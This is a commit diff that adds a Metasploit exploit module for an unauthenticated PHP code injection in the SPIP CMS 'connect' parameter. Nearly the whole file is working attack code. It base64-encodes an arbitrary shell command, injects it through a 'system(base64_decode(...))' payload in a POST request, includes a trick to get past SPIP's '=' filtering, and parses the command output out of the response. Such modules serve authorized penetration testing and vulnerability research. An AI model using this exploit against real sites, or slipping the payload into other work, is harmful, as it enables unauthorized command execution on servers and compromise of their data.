added exploit module for PHP inj in SPIP CMS

modules/exploits/linux/http/spip_connect_exec.rb

@@ -0,0 +1,99 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'base64'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'SPIP Connect Parameter Injection',
+			'Description'    => %q{
+				This module exploits a PHP code injection in SPIP. The vulnerability
+				exists in the connect parameter and allows an unauthenticated user
+				to execute arbitrary commands with web user privileges. Branchs 2.0/2.1/3 are concerned.
+				Vulnerable versions are < 2.0.21 & < 2.1.16 & < 3.0.3.
+				The module has been tested successfully with SPIP 2.0.11/Apache on Ubuntu and Fedora.
+			},
+			'Author'          =>
+				[
+					'Arnaud Pachot',					#Initial discovery
+					'Davy Douhine and Frederic Cikala',	#PoC
+					'Davy Douhine',						#MSF module
+				],
+			'License'         => MSF_LICENSE,
+			'References'      =>
+				[
+					[ 'BID', '54292' ],
+					[ 'URL', 'http://contrib.spip.net/SPIP-3-0-3-2-1-16-et-2-0-21-a-l-etape-303-epate-la' ]
+				],
+			'Platform'       => ['unix'],
+			'Arch'           => ARCH_CMD,
+			'Payload'        =>
+				{
+					'Space'       => 1024,
+					'DisableNops' => true,
+					'Compat'      =>
+						{
+							'PayloadType' => 'cmd',
+						}
+				},
+			'Targets'        =>
+				[
+					[ 'Automatic', { } ]
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Jul 04 2012'))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [true, 'The base path to SPIP application', '/']),
+			], self.class)
+	end
+
+	def exploit
+		uri = normalize_uri(target_uri.path, 'spip.php')
+		print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
+
+		# Very dirty trick !
+		# The SPIP server answers an HTML page which contains the ouput of the executed command on target.
+		# To easily extract the command output a header and a trailer are used.
+		# Then the whole thing (header + CMD + trailer) is base64 encoded to avoid spaces/special char filtering
+		# The header and the trailer will then be used to display the result (print_status)
+		# Rex::Text.encode_base64() instead?
+		cmd64   = Rex::Text.encode_base64("echo \"-123-\";#{datastore['CMD']}\;echo \"-456-\";")
+
+		# Another dirty trick !
+		# A character is added in the trailer to make the cmd64 string longer and avoid SPIP "=" filtering.
+		if cmd64.include?("=")
+			cmd64   = Rex::Text.encode_base64("echo \"-123-\";#{datastore['CMD']}\;echo \"-456--\";")
+		end
+
+		# The (trivial) vuln
+		data_cmd = "connect=?><? system(base64_decode(#{cmd64}))?>"
+
+		begin
+			print_status("Attempting to connect to #{rhost}:#{rport}")
+			res = send_request_cgi(
+				{
+					'uri'    => uri,
+					'method' => 'POST',
+					'data'   => data_cmd
+				})
+			if (res)
+		# Extracting the output of the executed command (using the dirty trick)
+			result = res.body.to_s.split("-123-").last.to_s.split("-456-").first
+				print_status("Output: #{result}")
+			end
+		end
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+		rescue ::Timeout::Error, ::Errno::EPIPE
+	end
+end